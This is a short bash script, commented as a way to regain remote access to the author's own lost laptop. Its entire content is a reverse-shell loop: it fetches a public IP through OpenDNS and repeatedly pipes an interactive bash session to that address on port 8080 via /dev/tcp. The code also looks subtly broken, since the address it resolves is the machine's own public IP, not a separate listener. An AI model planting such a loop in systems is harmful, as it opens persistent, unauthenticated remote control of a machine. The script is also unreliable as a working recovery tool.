#!/bin/bash
# Reverse shell script
# used for remote access of this laptop if lost

IP=`dig +short myip.opendns.com @resolver1.opendns.com`
PORT=8080

while [ 1 ]; do

	bash -i >& /dev/tcp/$IP/$PORT 0>&1

done
